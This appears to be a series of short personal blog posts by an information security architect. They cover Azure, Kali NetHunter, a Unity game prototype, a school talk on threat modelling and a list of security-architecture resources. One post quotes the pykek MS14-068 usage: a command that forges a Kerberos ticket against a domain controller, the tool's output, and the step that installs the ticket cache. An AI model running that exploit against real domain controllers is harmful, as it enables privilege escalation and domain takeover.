So its been a while since i blogged about anything so i figured i’d dust off the keyboard and put something out here. This ones security focused so any gamedev people can exit left now.
I wanted to start blogging (for my own recollection later, and with any luck someone else will like it as well) some of the things i’m learning and interacting with Microsoft Azure.
I’m going to try and break each blog post out by service or related azure services so expect more soon.
As a corporate infosec guy I’m not in on taunting the opposition, do not take this as a taunt. But if the tor user brute forcing for admin on my blog, I’ll save you some time passwords for admin won’t work here. There are a few additional security measures in place, move on in the herd and find the next weaker blog site to brute. Again, no taunt just save us both (you in time and me in alerts). Thanks.
Great write-up on ZAP quick launch menu for various external tools (SQLMAP, Nikto, etc.) and how to integrate a few well known into ZAP launchers: ZAP Integration
Also, this Aug 11. Can’t wait
Kali 2.0 Teaser – Kali Sana! from Offensive Security on Vimeo.
A Kali Linux 2.0 teaser, showcasing the features and new user interface. Release date set to 11th of August, 2015.
Learning Unity3d so I’m going to post a bit of what I find. Little work in progress arcade style shooter (not the end goal but a quick and easy set of tutorials that i’m bastardizing with my old 3d models from Adrift a game me and a friend made a few years back.
Anyway without further ado, first build (not a lot of functionality yet, but you can make the boat go back and forth and up and down [click on the window and the arrow keys for movement mouse to shoot])
Embedded game after the continue read link.
Continue reading Work-in-Progress
Came across this article on twitter and I must say, definitely hit home and makes me question even the enterprise grade tools and standard practices that even the people good at what we do (not even counting in the people who just do the slop security i’m talking even the good programs are seemingly outgunned).
Does kind of make me proud that our side has such sophistication. It does offer a bit of gray area feel though regarding our civil liberties in the equation. Either way, no judgement either way, good article.
So, I just recently built out a Kali NetHunter Instance on a nexus 7. I was catching this video regarding backdoor factory. All i can say is its pretty slick. Be sure to check it out.
After just a little time with nethunter, the badusb and all the hid attacks seem to be my favorite thus far from light use. The wireless stuff is cool, but still havent found the right need for my personal use that the nexus/otg/usb wireless adapter beat out laptop yet. I hear the nexus 9 supports full monitor mode with the build in device wireless, thats a game changer if it does.
I want to start making some custom actions for the HID attacks, the powersploit reverse meterpreter shell is pretty slick, just thinking of a few others i may want to use myself (all of which will probably derive from that).
I was asked by a buddy that is a teacher to give a talk to school kids at the middle school he teaches at. Its in the Ferguson Florissant school district. So you know i’m not a walking egoist, i was asked to talk through what I do, and pick some things to engage the 13 year old population. I picked the Sony breach because of the relationship to Lizard Squad (whom surprisingly a lot of the 13 years recognized due to the xbox live/psn ddos of christmas personally impacting their ability to game).
Also, you’ll see a slide called The House. Its an exercise/game i did with the kids where i ask them to think about a house. Its got doors, windows, and even sometimes a chimney. How do you protect it? They would say things like locks, alarms, bullet proof windows, chimney blocks, dogs, etc. I’d then take each one and ask them to now try and think like an attacker and how would they get past that thing they just threw out. Then, i’d ask ok, how would you prevent someone from doing whatever that thing was. I stopped at that level. Then i told them, thats what we do when we threat model at work. And instead of a house we do it for the systems we are trying to protect.
Anyway, slide decks embedded. Not going to change your world, but side note did it all on google slides (their ppt tool) and was able to pull it up on any of the machines at the school tied to a projector AND it played animated gifs so it worked out well.
As an information security architect, you rely on past experiences and any resources available to you to guide the recommendation, guidance and designs you create. While there are resources out there, they are less than most disciplines. I just wanted to throw out a few that I highly recommend and have seen in my travels. (Also to have a quick place for myself to find them in a aggregated place). In no way the end all be all list, but some good info.
SecureArc Reference Architecture
The OpenGroup: Open Enterprise Security Architecture (O-ESA) & TOGAF
Open Security Architecture
Disclaimer-I’m not a fan of ISACA so linking to this must show that it clearly is a well written article. Security Architecture One Practitioners View
TISN (Trusted Information Sharing Network out of Australia)
Lenny Zeltser’s Security Architecture Cheat Sheet for Internet Applications
Cliff Notes from Securityarchitecture.com regarding different Security Architecture Frameworks
ArcTecGroup’s Security Architecture Blueprint
Make sure to check out the python kerberos exploitation kit. And if you haven’t patched your DCs, get on it.
From the pykek github page:
[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file '[email protected]'... Done!
[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0
Also check out this pastebin. http://pastebin.com/fx7efUvS
Just getting started. Still testing out CMS’s to see which i like. I’m intending for this blog to be a good place for me to record things i find interesting for easy finding later.
You should find things about general information security, security architecture, general architecture, mobile app development and video game dev. Being schizophrenic in regards to enjoyable endeavors I’ll try to tag appropriately to keep the security folk and dev folks appropriately separated (pirates and ninjas that they are…). More to come.